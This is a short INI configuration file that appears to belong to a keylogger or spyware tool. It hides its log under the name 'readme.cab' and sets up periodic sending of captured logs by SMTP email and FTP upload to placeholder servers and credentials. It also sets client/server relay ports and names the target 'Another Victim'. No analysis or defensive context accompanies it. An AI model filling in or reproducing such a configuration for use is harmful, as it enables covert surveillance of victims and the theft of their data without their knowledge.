[Section1]
LogLocation=readme.cabXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Email=1XXXXXXXXXXXX
SmtpServer=192.168.0.1XXXXXXXXXXXXX
Port=25XXXXXXXXXXX
EmailAddress=EMailAdrress@Goes.HereXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
SendHours=5XXXXXXXXXXXXX
CurrentHours=1XXXXX
ProgActAs=1
ClientServer=1
ServerPort=500XXXXXXXXXXXXXXXXXXXXXXX
UpServerIP=noneXXXXXXXXXXXXXXXXXXXXXXXXX
ConnectServerPort=500XXXXXXXXXXXXXX
ClientName=Another VictimXXXXXXXXX
CliReBoots=4XXXXXXXXX
ClientCurrent=4XXXXXXXXXXXXXX
LogLocal=1XXXXXXXXXXXXXXXXXXX
ErrorMessage=0XXXXXXXX
CachedPTime=60XXXXXXXXXXXXXXXX
CachedPEnabled=0XXXXXXXXXXXXX
FTPEnabled=0XXXXXXXXXXXXXXXX
FTPIPAdd=129.168.000.111XXXXXXXXXXXXXXXXX
FTPPort=21XXXXXXXXXXXXXXXXXXXXXXX
FTPUser=UserNameXXXXXXXXXXXXXXXX
FTPPassword=PasswordXXXXXXXXXXXXXXXXXXXXXXXXX
FTPBoot=6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
FTPCurBoot=0
FTPPath=/swish/logs/XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
